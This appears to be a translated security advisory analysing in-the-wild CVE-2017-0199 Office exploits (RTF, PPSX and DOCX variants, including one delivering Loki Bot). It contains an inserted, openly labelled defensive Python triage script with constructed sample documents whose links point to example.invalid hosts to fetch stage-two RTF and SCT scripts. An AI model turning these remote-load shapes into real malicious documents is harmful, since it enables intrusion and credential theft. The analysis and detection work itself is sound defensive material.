Source: myhack58 | Author: Anonymous (佚名) | ID: MYHACK58:62201788439
History: Aug 08, 2017 - 12:00 a.m.

Analysis of in-the-wild exploitation of advanced-threat Office vulnerabilities - Vulnerability Warning - 黑吧安全网 (www.myhack58.com)

2017-08-08 00:00:00
Anonymous (佚名)
www.myhack58.com

CVSS3: 7.8 High
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS2: 9.3 High
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS: 0.974 High
Percentile: 99.9%

Background on advanced-threat Office vulnerabilities
In advanced threat attacks, the vulnerabilities attackers most like to use for remotely delivering an intrusion to the client are Office document vulnerabilities. At the just-concluded Black Hat conference, the award for best client-side security vulnerability went to CVE-2017-0199, currently the most popular vulnerability in the Office exploitation space; the honour was credited to Ryan Hanson, Haifei Li, Bing Sun and an unknown hacker.

![](/Article/UploadPic/2017-8/2017881861997.png?www.myhack58.com)
CVE-2017-0199 is a logic vulnerability in the Office suite. Unlike conventional memory-corruption vulnerabilities, this class of bug needs no complex exploitation technique: an Office document can run an arbitrary malicious script directly, and exploitation is stable and reliable. Microsoft fixed CVE-2017-0199 in the April security update, but the patch's mitigation can still be bypassed, and the July security update fixed a new vulnerability of the same type, CVE-2017-8570. At the SyScan360 2017 Seattle security conference, Haifei Li and Bing Sun's talk "Moniker Magic: Running Scripts Directly in Microsoft Office" analysed the principle behind this class of vulnerability in detail, which this article will not repeat; instead, the following focuses on analysing in-the-wild exploitation of these vulnerabilities.
First in-the-wild version: RTF
When CVE-2017-0199 was first disclosed, the earliest in-the-wild samples were spread as Word documents. Because Office parses document extensions loosely, changing the extension to another document type still lets the attack succeed, so most malicious documents in the wild are really in RTF format but carry a .doc, .docx or similar extension, which gives the attack strong camouflage. The in-the-wild sample's file contains the keyword field objupdate, whose role is to update the object automatically: when the victim opens the Office document, it loads the remote URL object and sends an HTTP request to the remote server; the malicious server answers the client's HTTP request with a forced Content-Type of application/hta, and the client Office process ultimately runs the downloaded remote file as an HTA script. The whole attack chain is stable and requires no interaction from the victim.

![](/Article/UploadPic/2017-8/2017881861193.png?www.myhack58.com)
Second in-the-wild version: PPSX
Because the RTF version of the exploit was used so heavily, detection rates of domestic security software for it became relatively high, and attackers began turning to another Office document format. They found that a PPSX slideshow document can also trigger the vulnerability without interaction. The technique uses slide animation events: certain predefined trigger events in a slide fire automatically and lead to exploitation.
The figure below shows the malicious animation event embedded in a popular attack sample:

![](/Article/UploadPic/2017-8/2017881862289.png?www.myhack58.com)
The event is associated with an OLE link object; the principle is similar to the RTF version, as the fields in the following XML show.

![](/Article/UploadPic/2017-8/2017881862532.png?www.myhack58.com)
But the object embeds a remote address with a script: protocol header, and the file at the URL in the XML is a malicious SCT script.

![](/Article/UploadPic/2017-8/2017881862929.png?www.myhack58.com)
When the victim opens the malicious slideshow document, it automatically loads the remote URL object, sends an HTTP request to the remote server to download the file locally, and the client Office process ultimately executes the downloaded file as an SCT script.
The latest popular third version: DOCX
Recently we found documents whose real format is DOCX with the CVE-2017-0199 exploit added. The attacker very cleverly embeds the RTF file containing CVE-2017-0199 into the DOCX document as a remote source, so that when the resulting DOCX file is opened it automatically fetches the remote RTF file containing the 0199 vulnerability and then triggers the subsequent chain of attacks. Such attacks make detection harder for security software, and some antivirus products do not notice at all!
In the figure below, we can see that the DOCX document embeds a remote document object:

![](/Article/UploadPic/2017-8/2017881862940.png?www.myhack58.com)
Once the document is opened, it automatically opens the remote malicious RTF file!

![](/Article/UploadPic/2017-8/2017881862112.png?www.myhack58.com)
We can see that the in-the-wild RTF sample's detection rate on VT is 31/59,

![](/Article/UploadPic/2017-8/2017881862507.png?www.myhack58.com)
while the latest popular DOCX version's detection rate is only 5/59.

![](/Article/UploadPic/2017-8/2017881862829.png?www.myhack58.com)
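To tie the three in-the-wild shapes described above together from the defender's side (an RTF carrying \objupdate under a .docx extension, a PPSX whose relationship target is a script: moniker to an SCT, and a DOCX whose OLE relationship links out to a remote RTF), here is an added triage script that is not from the original article: it classifies a file by its magic bytes rather than its extension and lists the remote-load indicators it contains. The sample documents, the example.invalid hosts and the part names are constructed placeholders, and the script only inspects the container, never fetching any target.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
DOC_EXTS = (".doc", ".docx", ".dot", ".ppt", ".pptx", ".ppsx", ".xls", ".xlsx")
def true_format(data):
    """Classify by magic bytes, since the extension may lie (an RTF named .docx)."""
    if data.lstrip().startswith(b"{\\rt"):
        return "rtf"
    return "ooxml" if data.startswith(b"PK\x03\x04") else "other"

def rtf_indicators(data):
    # \objupdate makes a linked OLE object refresh, i.e. fetch its URL, when the file opens.
    return ["rtf: \\objupdate auto-updating object"] if re.search(rb"\\objupdate\b", data) else []
def ooxml_indicators(data):
    """Walk every .rels part in the zip; External targets are the remote-load hook."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in (n for n in z.namelist() if n.endswith(".rels")):
            rels = ET.fromstring(z.read(name)).iter(REL_NS + "Relationship")
            for rel in (r for r in rels if r.get("TargetMode") == "External"):
                target = rel.get("Target", "")
                if target.lower().startswith("script:"):       # PPSX -> SCT shape
                    hits.append(f"{name}: script: moniker -> {target}")
                elif rel.get("Type") == OLE_REL or target.lower().endswith(".rtf"):
                    hits.append(f"{name}: external OLE link -> {target}")  # DOCX -> RTF shape
    return hits

def classify(filename, data):
    fmt = true_format(data)
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    mismatch = (fmt == "rtf" and ext in DOC_EXTS) or (fmt == "ooxml" and ext == ".rtf")
    hits = {"rtf": rtf_indicators, "ooxml": ooxml_indicators}.get(fmt, lambda d: [])(data)
    return {"true_format": fmt, "extension_mismatch": mismatch, "indicators": hits}

def build_ooxml(rels_part, rels_xml):
    buf = io.BytesIO()  # constructed minimal OOXML container with one .rels part
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(rels_part, rels_xml)
    return buf.getvalue()
# Constructed stand-ins for the three shapes (no real payloads; .invalid hosts).
REL_XML = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
           '<Relationship Id="rId1" Type="{}" Target="{}" TargetMode="External"/></Relationships>')
RTF_AS_DOC = b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objdata 0105}}}"
DOCX_REMOTE_RTF = build_ooxml("word/_rels/document.xml.rels", REL_XML.format(OLE_REL, "http://example.invalid/stage2.rtf"))
PPSX_SCT = build_ooxml("ppt/slides/_rels/slide1.xml.rels", REL_XML.format(OLE_REL, "script:http://example.invalid/stage2.sct"))
```

Run `classify(name, open(name, "rb").read())` over a mail-gateway quarantine to surface an extension mismatch plus a remote-load indicator, which is the combination all three in-the-wild variants share.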
The latest discovery: the "oolong" (mislabeled) sample
Last week we found many malicious Office slideshow samples in the wild labeled as CVE-2017-8570, and some vendors claimed to have been the first to capture the latest Office vulnerability. After analysis, however, we found that the samples are still the second in-the-wild PPSX version of CVE-2017-0199. Analysing a typical sample, we found that its payload is the Loki Bot credential-stealing Trojan, used for targeted theft attacks.

![](/Article/UploadPic/2017-8/2017881862994.png?www.myhack58.com)
